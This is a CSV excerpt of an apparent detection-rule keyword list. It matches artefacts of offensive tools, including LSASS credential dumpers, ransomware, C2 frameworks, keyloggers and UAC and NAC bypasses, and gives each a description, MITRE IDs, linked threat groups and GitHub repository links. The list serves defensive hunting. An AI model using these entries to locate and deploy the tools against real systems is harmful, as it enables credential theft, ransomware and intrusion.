"*nac_bypass*",".{0,1000}nac_bypass.{0,1000}","offensive_tool_keyword","nac_bypass","nac bypass - The basic requirement for an NAC bypass is access to a device that has already been authenticated. This device is used to log into the network and then smuggle in network packages from a different device. This involves placing the attackers system between the network switch and the authenticated device. One way to do this is with a Raspberry Pi and two network adapters","T1550.002 - T1078 - T1133 - T1040 - T1550","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Defense Evasion","https://github.com/scipag/nac_bypass","1","1","N/A","N/A","N/A","3","299","69","2025-02-24T14:17:42Z","2019-01-03T06:55:00Z","52573"
"*nachovpn.core.*",".{0,1000}nachovpn\.core\..{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","0","#content","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","52574"
"*nachovpn.local*",".{0,1000}nachovpn\.local.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","1","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","52575"
"*nachovpn.plugins.*",".{0,1000}nachovpn\.plugins\..{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","0","#content","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","52576"
"*nachovpn/server.py*",".{0,1000}nachovpn\/server\.py.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","0","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","52577"
"*nagios-root-privesc.sh*",".{0,1000}nagios\-root\-privesc\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","52578"
"*naksyn/Pyramid*",".{0,1000}naksyn\/Pyramid.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","52579"
"*Name   : UAC Bypass Win Server 2022*",".{0,1000}Name\s\s\s\:\sUAC\sBypass\sWin\sServer\s2022.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","#content","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","52580"
"*--name chisel -p *",".{0,1000}\-\-name\schisel\s\-p\s.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","52581"
"*name of the generated VBA module to include as a payload*",".{0,1000}name\sof\sthe\sgenerated\sVBA\smodule\sto\sinclude\sas\sa\spayload.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","52582"
"*named_pipes.txt*",".{0,1000}named_pipes\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52584"
"*NamedPipeImpersonation.cs*",".{0,1000}NamedPipeImpersonation\.cs.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","52585"
"*NamedPipeImpersonation.exe*",".{0,1000}NamedPipeImpersonation\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","52586"
"*NamedPipeImpersonation.exe*",".{0,1000}NamedPipeImpersonation\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","52587"
"*NamedPipeMaster/releases/download/*",".{0,1000}NamedPipeMaster\/releases\/download\/.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52588"
"*NamedPipeMaster-32bit.zip*",".{0,1000}NamedPipeMaster\-32bit\.zip.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52589"
"*NamedPipeMaster-32bit\*",".{0,1000}NamedPipeMaster\-32bit\\.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52590"
"*NamedPipeMaster-64bit.zip*",".{0,1000}NamedPipeMaster\-64bit\.zip.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52591"
"*NamedPipeMaster-64bit\*",".{0,1000}NamedPipeMaster\-64bit\\.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52592"
"*NamedPipeMasterLogger*",".{0,1000}NamedPipeMasterLogger.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52593"
"*NamedPipeMaster-main.zip*",".{0,1000}NamedPipeMaster\-main\.zip.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52594"
"*NamedPipePoker.cpp*",".{0,1000}NamedPipePoker\.cpp.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52595"
"*NamedPipePoker.h*",".{0,1000}NamedPipePoker\.h.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52596"
"*NamedPipeProxyPoker*",".{0,1000}NamedPipeProxyPoker.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52597"
"*NamedPipeServer.ps1*",".{0,1000}NamedPipeServer\.ps1.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","52598"
"*NamelessImplant.dll*",".{0,1000}NamelessImplant\.dll.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","1","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","52599"
"*namelessserver.com*",".{0,1000}namelessserver\.com.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","1","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","52600"
"*NamelessTerminal <OperatorName> <alive/all>*",".{0,1000}NamelessTerminal\s\<OperatorName\>\s\<alive\/all\>.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#content","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","52601"
"*namespace BackupCreds*",".{0,1000}namespace\sBackupCreds.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","52602"
"*namespace CredPhisher*",".{0,1000}namespace\sCredPhisher.{0,1000}","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","52603"
"*namespace Discord_rat*",".{0,1000}namespace\sDiscord_rat.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","52604"
"*namespace hidden_tear*",".{0,1000}namespace\shidden_tear.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","52605"
"*namespace hidden_tear.Tools,*",".{0,1000}namespace\shidden_tear\.Tools,.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","52606"
"*namespace Jasmin_Encrypter*",".{0,1000}namespace\sJasmin_Encrypter.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","52607"
"*namespace Keylogger*",".{0,1000}namespace\sKeylogger.{0,1000}","offensive_tool_keyword","SharpLogger","Keylogger written in C#","T1056.001 - T1056.003","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/djhohnstein/SharpLogger","1","0","N/A","N/A","10","2","126","41","2019-12-13T04:40:56Z","2018-12-18T01:45:17Z","52608"
"*namespace KrbRelayUp*",".{0,1000}namespace\sKrbRelayUp.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","52609"
"*namespace LockLess*",".{0,1000}namespace\sLockLess.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","N/A","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","52610"
"*namespace NTLMInjector*",".{0,1000}namespace\sNTLMInjector.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","N/A","N/A","10","2","167","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z","52611"
"*namespace POSTDump*",".{0,1000}namespace\sPOSTDump.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","#content","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","52612"
"*namespace POSTMiniDump*",".{0,1000}namespace\sPOSTMiniDump.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","#content","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","52613"
"*namespace RedPersist.Persist*",".{0,1000}namespace\sRedPersist\.Persist.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","52616"
"*namespace RemotePipeList*",".{0,1000}namespace\sRemotePipeList.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","0","#content","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","52617"
"*namespace Rubeus*",".{0,1000}namespace\sRubeus.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","52618"
"*namespace SafetyDump*",".{0,1000}namespace\sSafetyDump.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","0","N/A","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","52619"
"*namespace SharpSC*",".{0,1000}namespace\sSharpSC.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","N/A","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","52620"
"*namespace SharpShares*",".{0,1000}namespace\sSharpShares.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","Black Basta - BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","52621"
"*namespace SharpSSDP*",".{0,1000}namespace\sSharpSSDP.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","0","N/A","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","52622"
"*namespace SilentCryptoMiner*",".{0,1000}namespace\sSilentCryptoMiner.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","52623"
"*namespace WheresMyImplant*",".{0,1000}namespace\sWheresMyImplant.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","52624"
"*namespace WmEye*",".{0,1000}namespace\sWmEye.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","0","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","52625"
"*nandydark/Linux-keylogger*",".{0,1000}nandydark\/Linux\-keylogger.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","52627"
"*nanjmdknhkinifnkgdcggcfnhdaammmj*",".{0,1000}nanjmdknhkinifnkgdcggcfnhdaammmj.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","52628"
"*nanodump *",".{0,1000}nanodump\s.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52630"
"*nanodump -*",".{0,1000}nanodump\s\-.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52631"
"*nanodump.*",".{0,1000}nanodump\..{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","52632"
"*nanodump.*",".{0,1000}nanodump\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52633"
"*nanodump.git*",".{0,1000}nanodump\.git.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52634"
"*nanodump.x64*",".{0,1000}nanodump\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52635"
"*nanodump.x64.exe*",".{0,1000}nanodump\.x64\.exe.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52636"
"*nanodump.x86*",".{0,1000}nanodump\.x86.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52637"
"*nanodump_dump*",".{0,1000}nanodump_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","52638"
"*nanodump_pipe*",".{0,1000}nanodump_pipe.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","52639"
"*nanodump_ppl.x64.dll*",".{0,1000}nanodump_ppl\.x64\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","52640"
"*nanodump_ppl_dump*",".{0,1000}nanodump_ppl_dump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52641"
"*nanodump_ppl_dump.x64*",".{0,1000}nanodump_ppl_dump\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52642"
